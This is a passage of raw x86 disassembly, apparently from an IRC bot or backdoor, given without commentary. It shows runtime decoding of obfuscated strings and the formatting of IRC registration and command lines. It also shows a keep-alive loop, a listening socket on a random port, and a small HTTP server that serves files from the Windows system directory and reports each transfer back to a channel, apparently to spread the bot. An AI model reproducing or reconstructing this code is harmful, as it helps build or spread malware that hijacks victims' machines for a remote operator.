loc_418DA1:				; CODE XREF: sub_418CAF+F7j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418DA1
		sub	eax, edx
		jz	short loc_418E17
		xor	eax, eax
		mov	[ebp+var_18], bl
		lea	edi, [ebp+var_17]
		stosd
		push	1FFh
		stosd
		lea	eax, [ebp+var_42F]
		push	ebx
		push	eax
		mov	[ebp+var_430], bl
		call	sub_408130
		mov	ebx, [ebp+var_44C]
		add	esp, 0Ch
		push	200h
		lea	esi, [ebp+var_430]
		call	sub_41A301
		pop	ecx
		push	9
		lea	esi, [ebp+var_18]
		mov	ebx, offset aSatt ; "‘€’’"
		call	sub_41A301
		mov	edi, [ebp+var_450]
		pop	ecx
		lea	eax, [ebp+var_430]
		push	eax
		mov	eax, esi
		push	eax
		push	offset aSS_8	; "%s %s\r\n"
		call	sub_417F4C
		add	esp, 0Ch
		xor	ebx, ebx

loc_418E17:				; CODE XREF: sub_418CAF+FBj
		xor	eax, eax
		mov	[ebp+var_24], bl
		lea	edi, [ebp+var_23]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_30], bl
		lea	edi, [ebp+var_2F]
		stosd
		stosd
		xor	eax, eax
		mov	[ebp+var_C], bl
		lea	edi, [ebp+var_B]
		stosd
		stosw
		xor	eax, eax
		push	ebx
		mov	[ebp+var_448], bl
		lea	edi, [ebp+var_447]
		stosw
		push	3
		mov	[ebp+var_444], bl
		lea	edi, [ebp+var_443]
		pop	ecx
		lea	esi, [ebp+var_448]
		stosw
		call	sub_419AD1
		pop	ecx
		push	ebx
		push	3
		lea	esi, [ebp+var_444]
		call	sub_419A9F
		xor	eax, eax
		lea	edi, [ebp+var_C]
		stosd
		stosw
		stosb
		mov	eax, esi
		push	eax
		lea	eax, [ebp+var_448]
		push	eax
		push	offset aSS_9	; "%s-%s"
		lea	eax, [ebp+var_C]
		push	6
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_C]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_418E9E:				; CODE XREF: sub_418CAF+1F4j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_418E9E
		sub	eax, esi
		mov	[ebp+eax+var_C], bl
		xor	eax, eax
		lea	edi, [ebp+var_448]
		stosw
		stosb
		xor	eax, eax
		lea	edi, [ebp+var_444]
		stosw
		push	9
		lea	esi, [ebp+var_24]
		mov	ebx, offset aPivk ; "ˆ‚Š"
		stosb
		call	sub_41A301
		pop	ecx
		push	9
		lea	esi, [ebp+var_30]
		mov	ebx, offset aFtdu ; "”’„“"
		call	sub_41A301
		mov	edi, [ebp+var_450]
		pop	ecx
		lea	ebx, [edi+5]
		call	sub_41810B
		push	ebx
		lea	eax, [ebp+var_C]
		push	eax
		mov	eax, esi
		push	eax
		push	ebx
		lea	eax, [ebp+var_24]
		push	eax
		push	offset aSSSS00S	; "%s %s\r\n%s %s 0 0 :%s\r\n"
		call	sub_417F4C
		add	esp, 18h
		mov	al, 1

loc_418F0B:				; CODE XREF: sub_418CAF+45j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	8
sub_418CAF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418F1C	proc near		; CODE XREF: sub_418F81+3Ep

var_10		= dword	ptr -10h
var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	[ebp+var_10], eax
		xor	eax, eax
		mov	[ebp+var_C], 0
		lea	edi, [ebp+var_B]
		push	5
		lea	esi, [ebp+var_C]
		mov	ebx, offset aPivk ; "ˆ‚Š"
		stosd
		call	sub_41A301
		mov	ebx, [ebp+var_10]
		pop	ecx
		add	ebx, 5
		call	sub_41810B
		push	ebx
		mov	eax, esi
		push	eax
		push	offset aSS_7	; "%s %s\r\n"
		mov	edi, offset dword_4294DC
		call	sub_417F4C
		mov	ecx, [ebp+var_4]
		add	esp, 0Ch
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn	4
sub_418F1C	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn bp-based	frame


sub_418F81	proc near		; DATA XREF: sub_41C77E+379o
		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		push	esi
		push	edi
		call	sub_419A20
		mov	edi, dword_4290B8
		mov	esi, dword_4290BC

loc_418F9A:				; CODE XREF: sub_418F81+5Aj
		call	sub_419A20
		cmp	dword_4290BC, esi
		jl	short loc_418FC4
		jg	short loc_418FB1
		cmp	dword_4290B8, edi
		jbe	short loc_418FC4

loc_418FB1:				; CODE XREF: sub_418F81+26j
		cmp	byte_4294E0, 0
		jz	short loc_418FC4
		push	offset dword_4294DC
		call	sub_418F1C

loc_418FC4:				; CODE XREF: sub_418F81+24j
					; sub_418F81+2Ej ...
		mov	edi, dword_4290B8
		mov	esi, dword_4290BC
		push	0C350h
		call	ds:off_41E0F8
		jmp	short loc_418F9A
sub_418F81	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_418FDD	proc near		; CODE XREF: sub_41976B+1Ep

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		lea	eax, [ebp+var_4]
		push	eax
		push	offset word_4291B4
		push	dword_4292CC
		mov	[ebp+var_4], 10h
		call	ds:dword_41E234	; accept
		leave
		retn
sub_418FDD	endp


; =============== S U B	R O U T	I N E =======================================



sub_418FFF	proc near		; CODE XREF: sub_4191D2+1D2p

arg_0		= dword	ptr  4

		jmp	short loc_419004
; ---------------------------------------------------------------------------

loc_419001:				; CODE XREF: sub_418FFF+14j
		mov	byte ptr [eax],	5Ch

loc_419004:				; CODE XREF: sub_418FFFj
		push	2Fh
		push	[esp+4+arg_0]
		call	sub_403DE0
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	short loc_419001
		retn
sub_418FFF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419016	proc near		; CODE XREF: sub_4191D2+192p

var_C		= byte ptr -0Ch
var_8		= dword	ptr -8
var_4		= byte ptr -4
var_2		= byte ptr -2
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		mov	eax, esi
		push	edi
		lea	ecx, [eax+1]

loc_419027:				; CODE XREF: sub_419016+16j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419027
		sub	eax, ecx
		inc	eax
		push	eax
		call	sub_402BD6
		mov	ebx, eax
		push	ebx
		call	sub_402FD3
		push	eax
		push	0
		push	ebx
		call	sub_408130
		push	25h
		push	esi
		call	sub_403DE0
		add	esp, 1Ch
		test	eax, eax
		jnz	short loc_4190A0

loc_419057:				; CODE XREF: sub_419016+114j
		mov	eax, esi
		mov	edx, esi

loc_41905B:				; CODE XREF: sub_419016+4Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41905B
		mov	edi, ebx
		sub	eax, edx
		dec	edi

loc_419067:				; CODE XREF: sub_419016+57j
		mov	cl, [edi+1]
		inc	edi
		test	cl, cl
		jnz	short loc_419067
		mov	ecx, eax
		shr	ecx, 2
		mov	esi, edx
		mov	edx, [ebp+arg_0]
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		rep movsb
		xor	eax, eax
		mov	edi, edx
		stosd
		mov	eax, ebx
		sub	edx, ebx

loc_41908B:				; CODE XREF: sub_419016+7Dj
		mov	cl, [eax]
		mov	[edx+eax], cl
		inc	eax
		test	cl, cl
		jnz	short loc_41908B
		xor	esi, esi
		inc	esi
		jmp	loc_419131
; ---------------------------------------------------------------------------

loc_41909D:				; CODE XREF: sub_419016+10Ej
		mov	eax, [ebp+var_8]

loc_4190A0:				; CODE XREF: sub_419016+3Fj
		mov	byte ptr [eax],	0
		mov	ecx, esi

loc_4190A5:				; CODE XREF: sub_419016+94j
		mov	dl, [ecx]
		inc	ecx
		test	dl, dl
		jnz	short loc_4190A5
		sub	ecx, esi
		mov	edi, ebx
		mov	edx, ecx
		dec	edi

loc_4190B3:				; CODE XREF: sub_419016+A3j
		mov	cl, [edi+1]
		inc	edi
		test	cl, cl
		jnz	short loc_4190B3
		mov	ecx, edx
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		and	ecx, 3
		inc	eax
		push	2
		push	eax
		mov	[ebp+var_8], eax
		lea	eax, [ebp+var_4]
		push	eax
		rep movsb
		call	sub_403EA0
		lea	eax, [ebp+var_C]
		push	eax
		lea	eax, [ebp+var_4]
		push	offset asc_421664 ; "%x"
		push	eax
		mov	[ebp+var_2], 0
		call	sub_403B72
		add	esp, 18h
		test	eax, eax
		jz	short loc_41912F
		mov	eax, ebx
		lea	esi, [eax+1]

loc_4190FB:				; CODE XREF: sub_419016+EAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4190FB
		mov	cl, [ebp+var_C]
		sub	eax, esi
		mov	esi, [ebp+var_8]
		add	esi, 2
		push	25h
		push	esi
		mov	[eax+ebx], cl
		mov	byte ptr [eax+ebx+1], 0
		call	sub_403DE0
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	[ebp+var_8], eax
		jnz	loc_41909D
		jmp	loc_419057
; ---------------------------------------------------------------------------

loc_41912F:				; CODE XREF: sub_419016+DEj
		xor	esi, esi

loc_419131:				; CODE XREF: sub_419016+82j
		push	ebx
		call	sub_403129
		pop	ecx
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		leave
		retn
sub_419016	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41913F	proc near		; CODE XREF: sub_4191D2+A1p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_0]
		mov	[eax], esi
		mov	eax, [ebp+arg_4]
		push	edi
		mov	[eax], esi
		mov	eax, [ebp+arg_8]
		push	offset asc_42164C ; "\r\n"
		push	esi
		mov	[ebx], esi
		mov	[eax], esi
		call	sub_403D40
		mov	edi, eax
		test	edi, edi
		pop	ecx
		pop	ecx
		jnz	short loc_41916B

loc_419167:				; CODE XREF: sub_41913F+52j
					; sub_41913F+69j ...
		xor	eax, eax
		jmp	short loc_4191CF
; ---------------------------------------------------------------------------

loc_41916B:				; CODE XREF: sub_41913F+26j
		push	offset asc_421650 ; " "
		push	esi
		mov	byte ptr [edi],	0
		call	sub_403FC4
		mov	ecx, [ebp+arg_0]
		push	offset asc_421654 ; " "
		push	0
		mov	[ecx], eax
		call	sub_403FC4
		add	esp, 10h
		test	eax, eax
		mov	[ebx], eax
		jz	short loc_419167
		push	offset asc_421658 ; " "
		push	0
		call	sub_403FC4
		test	eax, eax
		pop	ecx
		pop	ecx
		mov	ecx, [ebp+arg_4]
		mov	[ecx], eax
		jz	short loc_419167
		mov	ecx, [ebp+arg_8]
		lea	eax, [edi+2]
		cmp	byte ptr [eax],	0
		mov	[ecx], eax
		jz	short loc_4191CC
		push	offset asc_42165C ; "\r\n\r\n"
		push	eax
		call	sub_403D40
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_419167
		mov	byte ptr [eax+2], 0

loc_4191CC:				; CODE XREF: sub_41913F+76j
		xor	eax, eax
		inc	eax

loc_4191CF:				; CODE XREF: sub_41913F+2Aj
		pop	edi
		pop	ebp
		retn
sub_41913F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=0CA8h


sub_4191D2	proc near		; CODE XREF: sub_41976B+28p

var_D28		= dword	ptr -0D28h
var_D24		= dword	ptr -0D24h
var_D20		= dword	ptr -0D20h
var_D1C		= dword	ptr -0D1Ch
var_D18		= byte ptr -0D18h
var_D14		= byte ptr -0D14h
var_D13		= byte ptr -0D13h
var_D12		= byte ptr -0D12h
var_D11		= byte ptr -0D11h
var_D08		= byte ptr -0D08h
var_D07		= byte ptr -0D07h
var_908		= byte ptr -908h
var_907		= byte ptr -907h
var_508		= byte ptr -508h
var_507		= byte ptr -507h
var_108		= byte ptr -108h
var_107		= byte ptr -107h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		lea	ebp, [esp-0CA8h]
		sub	esp, 0D28h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+0CA8h+var_4], eax
		push	ebx
		push	esi
		mov	esi, 3FFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp+0CA8h+var_907]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_908], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+0CA8h+var_507]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_508], bl
		call	sub_408130
		push	103h
		lea	eax, [ebp+0CA8h+var_107]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_108], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+0CA8h+var_D07]
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_D08], bl
		call	sub_408130
		add	esp, 30h
		push	ebx
		push	400h
		lea	eax, [ebp+0CA8h+var_D08]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	ds:dword_41E26C	; recv
		mov	[ebp+eax+0CA8h+var_D08], bl
		lea	eax, [ebp+0CA8h+var_D1C]
		push	eax
		lea	eax, [ebp+0CA8h+var_D20]
		push	eax
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		lea	ebx, [ebp+0CA8h+var_D24]
		lea	esi, [ebp+0CA8h+var_D08]
		call	sub_41913F
		add	esp, 0Ch
		test	eax, eax
		jz	loc_419754
		mov	esi, [ebp+0CA8h+var_D28]
		push	edi
		push	4
		mov	edi, offset aGet ; "GET"
		pop	ecx
		xor	eax, eax
		repe cmpsb
		jz	loc_419360
		push	offset aQue?	; "Que?"
		mov	esi, 3FFh
		lea	eax, [ebp+0CA8h+var_908]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_908]
		add	esp, 0Ch
		lea	edx, [eax+1]

loc_4192BC:				; CODE XREF: sub_4191D2+EFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_4192BC
		sub	eax, edx
		xor	ebx, ebx
		mov	[ebp+eax+0CA8h+var_908], bl
		lea	eax, [ebp+0CA8h+var_908]
		lea	ecx, [eax+1]

loc_4192D7:				; CODE XREF: sub_4191D2+10Aj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_4192D7
		sub	eax, ecx
		push	eax
		push	offset aHttp1_1501NotI ; "HTTP/1.1 501 Not Implemented\r\nContent-L"...
		lea	eax, [ebp+0CA8h+var_508]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_508]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4192FF:				; CODE XREF: sub_4191D2+132j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_4192FF
		sub	eax, ecx
		mov	[ebp+eax+0CA8h+var_508], bl
		lea	eax, [ebp+0CA8h+var_508]
		lea	ecx, [eax+1]

loc_419318:				; CODE XREF: sub_4191D2+14Bj
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_419318
		mov	esi, ds:dword_41E228
		push	ebx
		sub	eax, ecx
		push	eax
		lea	eax, [ebp+0CA8h+var_508]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		lea	eax, [ebp+0CA8h+var_908]
		lea	ecx, [eax+1]

loc_419341:				; CODE XREF: sub_4191D2+174j
		mov	dl, [eax]
		inc	eax
		cmp	dl, bl
		jnz	short loc_419341
		push	ebx
		sub	eax, ecx
		push	eax
		lea	eax, [ebp+0CA8h+var_908]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		jmp	loc_419747
; ---------------------------------------------------------------------------

loc_419360:				; CODE XREF: sub_4191D2+C1j
		mov	edi, [ebp+0CA8h+var_D24]
		push	edi
		call	sub_419016
		test	eax, eax
		pop	ecx
		jz	loc_419753
		mov	eax, edi
		lea	edx, [eax+1]

loc_419377:				; CODE XREF: sub_4191D2+1AAj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_419377
		sub	eax, edx
		cmp	eax, 1
		jbe	loc_4194C9
		inc	edi
		push	2Fh
		push	edi
		call	sub_403DE0
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		pop	ecx
		pop	ecx
		jz	loc_419426
		mov	[esi], bl
		inc	esi
		push	esi
		call	sub_418FFF
		push	ebx
		push	esi
		call	sub_403DE0
		add	esp, 0Ch
		cmp	[esi], bl
		jz	short loc_4193EF
		cmp	byte ptr [eax-1], 5Ch
		jz	short loc_4193EF
		push	esi
		push	edi
		push	offset dword_4291C8
		push	offset aSSS	; "%s\\%s\\%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 18h
		lea	esi, [eax+1]

loc_4193E6:				; CODE XREF: sub_4191D2+219j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4193E6
		jmp	short loc_419455
; ---------------------------------------------------------------------------

loc_4193EF:				; CODE XREF: sub_4191D2+1E3j
					; sub_4191D2+1E9j
		push	offset dword_4293D8
		push	esi
		push	edi
		push	offset dword_4291C8
		push	offset aSSSS	; "%s\\%s\\%s%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_41941D:				; CODE XREF: sub_4191D2+250j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41941D
		jmp	short loc_419455
; ---------------------------------------------------------------------------

loc_419426:				; CODE XREF: sub_4191D2+1C8j
		push	edi
		push	offset dword_4291C8
		push	offset aSS_4	; "%s\\%s"
		lea	eax, [ebp+0CA8h+var_108]
		push	103h
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_108]
		add	esp, 14h
		lea	esi, [eax+1]

loc_41944E:				; CODE XREF: sub_4191D2+281j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_41944E

loc_419455:				; CODE XREF: sub_4191D2+21Bj
					; sub_4191D2+252j
		sub	eax, esi
		mov	[ebp+eax+0CA8h+var_108], bl
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		push	offset byte_4292D0
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jz	short loc_4194CB
		mov	esi, 200h
		push	esi
		call	sub_403C6E
		push	esi
		mov	edi, eax
		push	ebx
		push	edi
		mov	[ebp+0CA8h+var_D20], edi
		call	sub_408130
		add	esp, 10h
		push	offset aQue?_1	; "Que?"
		push	edi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_4194AC:				; CODE XREF: sub_4191D2+2DFj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4194AC
		sub	eax, esi
		mov	[eax+edi], bl
		mov	eax, edi
		lea	esi, [eax+1]

loc_4194BD:				; CODE XREF: sub_4191D2+2F0j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4194BD
		jmp	loc_4195AE
; ---------------------------------------------------------------------------

loc_4194C9:				; CODE XREF: sub_4191D2+1B1j
		xor	ebx, ebx

loc_4194CB:				; CODE XREF: sub_4191D2+2A1j
		push	ebx
		push	ebx
		push	3
		push	ebx
		push	1
		push	80000000h
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		call	ds:off_41E06C
		mov	esi, eax
		cmp	esi, 0FFFFFFFFh
		mov	[ebp+0CA8h+var_D24], esi
		jz	short loc_41955F
		push	ebx
		push	esi
		call	ds:off_41E070
		mov	edi, eax
		push	edi
		mov	[ebp+0CA8h+var_D1C], edi
		call	sub_403C6E
		push	edi
		push	ebx
		push	eax
		mov	[ebp+0CA8h+var_D20], eax
		call	sub_408130
		add	esp, 10h
		push	ebx
		push	ebx
		push	ebx
		push	esi
		mov	esi, ds:off_41E074
		call	esi ; sub_4594AE
		push	ebx
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		push	edi
		mov	edi, ds:off_41E078
		jmp	short loc_419551
; ---------------------------------------------------------------------------

loc_419529:				; CODE XREF: sub_4191D2+389j
		cmp	[ebp+0CA8h+var_D28], ebx
		jnz	loc_4195B3
		push	[ebp+0CA8h+var_D1C]
		push	ebx
		push	[ebp+0CA8h+var_D20]
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		push	ebx
		push	ebx
		push	[ebp+0CA8h+var_D24]
		call	esi ; sub_4594AE
		push	ebx
		lea	eax, [ebp+0CA8h+var_D28]
		push	eax
		push	[ebp+0CA8h+var_D1C]

loc_419551:				; CODE XREF: sub_4191D2+355j
		push	[ebp+0CA8h+var_D20]
		push	[ebp+0CA8h+var_D24]
		call	edi ; sub_4518B9
		test	eax, eax
		jnz	short loc_419529
		jmp	short loc_4195B3
; ---------------------------------------------------------------------------

loc_41955F:				; CODE XREF: sub_4191D2+31Aj
		mov	esi, 200h
		push	esi
		call	sub_403C6E
		push	esi
		mov	edi, eax
		push	ebx
		push	edi
		mov	[ebp+0CA8h+var_D20], edi
		call	sub_408130
		add	esp, 10h
		push	offset aQue?_0	; "Que?"
		push	edi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 0Ch
		lea	esi, [eax+1]

loc_419596:				; CODE XREF: sub_4191D2+3C9j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_419596
		sub	eax, esi
		mov	[eax+edi], bl
		mov	eax, edi
		lea	esi, [eax+1]

loc_4195A7:				; CODE XREF: sub_4191D2+3DAj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4195A7

loc_4195AE:				; CODE XREF: sub_4191D2+2F2j
		sub	eax, esi
		mov	[ebp+0CA8h+var_D1C], eax

loc_4195B3:				; CODE XREF: sub_4191D2+35Aj
					; sub_4191D2+38Bj
		push	400h
		lea	eax, [ebp+0CA8h+var_508]
		push	ebx
		push	eax
		call	sub_408130
		push	[ebp+0CA8h+var_D1C]
		lea	eax, [ebp+0CA8h+var_508]
		push	offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
		push	3FFh
		push	eax
		call	sub_40307C
		lea	eax, [ebp+0CA8h+var_508]
		add	esp, 1Ch
		lea	esi, [eax+1]

loc_4195EA:				; CODE XREF: sub_4191D2+41Dj
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_4195EA
		sub	eax, esi
		mov	[ebp+eax+0CA8h+var_508], bl
		lea	eax, [ebp+0CA8h+var_508]
		lea	esi, [eax+1]

loc_419603:				; CODE XREF: sub_4191D2+436j
		mov	cl, [eax]
		inc	eax
		cmp	cl, bl
		jnz	short loc_419603
		sub	eax, esi
		mov	esi, ds:dword_41E228
		push	ebx
		push	eax
		lea	eax, [ebp+0CA8h+var_508]
		push	eax
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		test	eax, eax
		jz	loc_41973E
		push	ebx
		push	[ebp+0CA8h+var_D1C]
		push	[ebp+0CA8h+var_D20]
		push	[ebp+0CA8h+arg_0]
		call	esi	; send
		test	eax, eax
		jz	loc_41973E
		lea	eax, [ebp+0CA8h+var_108]
		push	eax
		push	offset byte_4292D0
		call	sub_402E37
		test	eax, eax
		pop	ecx
		pop	ecx
		jnz	loc_41973E
		push	100h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		push	eax
		mov	ebx, offset aTtac ; "â‗"
		call	sub_41A301
		xor	eax, eax
		lea	edi, [ebp+0CA8h+var_D18]
		stosd
		stosd
		stosd
		add	esp, 0Ch
		stosd
		lea	eax, [ebp+0CA8h+var_D24]
		push	eax
		lea	eax, [ebp+0CA8h+var_D18]
		push	eax
		push	[ebp+0CA8h+arg_0]
		mov	[ebp+0CA8h+var_D24], 10h
		call	ds:dword_41E278	; getpeername
		movzx	eax, [ebp+0CA8h+var_D11]
		movzx	ecx, [ebp+0CA8h+var_D12]
		shl	eax, 8
		add	eax, ecx
		movzx	ecx, [ebp+0CA8h+var_D13]
		shl	eax, 8
		add	eax, ecx
		movzx	ecx, [ebp+0CA8h+var_D14]
		shl	eax, 8
		add	eax, ecx
		push	2
		mov	[ebp+0CA8h+var_D1C], eax
		push	4
		lea	eax, [ebp+0CA8h+var_D1C]
		push	eax
		call	ds:dword_41E224	; gethostbyaddr
		test	eax, eax
		push	dword_437B38
		jnz	short loc_419706
		movzx	eax, [ebp+0CA8h+var_D11]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D12]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D13]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D14]
		push	eax
		push	offset aHttpTransferD_ ; "HTTP:	Transfer: %d.%d.%d.%d (N/A). %d	T"...
		push	esi
		push	0
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 24h
		jmp	short loc_419731
; ---------------------------------------------------------------------------

loc_419706:				; CODE XREF: sub_4191D2+507j
		push	dword ptr [eax]
		movzx	eax, [ebp+0CA8h+var_D11]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D12]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D13]
		push	eax
		movzx	eax, [ebp+0CA8h+var_D14]
		push	eax
		push	offset aHttpTransfer_0 ; "HTTP:	Transfer: %d.%d.%d.%d (%s). %d To"...
		push	esi
		push	0
		push	offset dword_4294DC
		call	sub_417FE1
		add	esp, 28h

loc_419731:				; CODE XREF: sub_4191D2+532j
		inc	dword_437B38
		push	esi
		call	sub_403129
		pop	ecx

loc_41973E:				; CODE XREF: sub_4191D2+453j
					; sub_4191D2+46Aj ...
		push	[ebp+0CA8h+var_D20]
		call	sub_403B91
		pop	ecx

loc_419747:				; CODE XREF: sub_4191D2+189j
		push	[ebp+0CA8h+arg_0]
		call	ds:dword_41E280	; closesocket

loc_419753:				; CODE XREF: sub_4191D2+19Aj
		pop	edi

loc_419754:				; CODE XREF: sub_4191D2+ABj
		mov	ecx, [ebp+0CA8h+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		add	ebp, 0CA8h
		leave
		retn
sub_4191D2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41976B	proc near		; DATA XREF: sub_4198C0+27o

arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

; FUNCTION CHUNK AT 004401FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C375 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EEF3 SIZE 00000006 BYTES

		push	ebp
		mov	ebp, esp
		cmp	[ebp+arg_4], 401h
		jz	short loc_41977E
		pop	ebp
		jmp	ds:off_41E1FC
; ---------------------------------------------------------------------------

loc_41977E:				; CODE XREF: sub_41976B+Aj
		mov	eax, [ebp+arg_C]
		dec	eax
		jz	short loc_419790
		sub	eax, 7
		jnz	short loc_419799
		call	sub_418FDD
		jmp	short loc_419799
; ---------------------------------------------------------------------------

loc_419790:				; CODE XREF: sub_41976B+17j
		push	[ebp+arg_8]
		call	sub_4191D2
		pop	ecx

loc_419799:				; CODE XREF: sub_41976B+1Cj
					; sub_41976B+23j
		xor	eax, eax
		pop	ebp
		retn	10h
sub_41976B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_41979F	proc near		; CODE XREF: sub_4198C0+9Bp

arg_0		= dword	ptr  4

		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	edi, 104h
		push	edi
		xor	ebp, ebp
		push	ebp
		mov	ebx, offset dword_4291C8
		push	ebx
		call	sub_408130
		push	edi
		push	ebp
		mov	esi, offset dword_4293D8
		push	esi
		call	sub_408130
		push	edi
		push	ebp
		mov	ebp, offset byte_4292D0
		push	ebp
		call	sub_408130
		add	esp, 24h
		push	edi
		push	ebx
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		push	edi
		mov	ebx, offset aVqdD ; "²»²·¢ï¤¹¤"
		call	sub_41A301
		push	esi
		push	offset dword_4291C8
		push	offset aSS_1	; "%s\\%s"
		push	103h
		push	ebp
		call	sub_40307C
		mov	eax, ebp
		add	esp, 18h
		lea	ecx, [eax+1]

loc_419805:				; CODE XREF: sub_41979F+6Bj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419805
		push	0
		push	1
		sub	eax, ecx
		push	2
		mov	byte_4292D0[eax], dl
		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	dword_4292CC, eax
		jnz	short loc_419838
		push	eax

loc_41982B:				; CODE XREF: sub_41979F+E7j
		call	ds:dword_41E280	; closesocket
		xor	eax, eax
		jmp	loc_4198BB
; ---------------------------------------------------------------------------

loc_419838:				; CODE XREF: sub_41979F+89j
		mov	eax, 0FFDCh
		mov	ebx, 3E8h
		call	sub_419F47
		push	eax
		mov	dword_4290B4, eax
		mov	word_4291B4, 2
		call	ds:dword_41E270	; htons
		and	dword_4291B8, 0
		push	10h
		push	offset word_4291B4
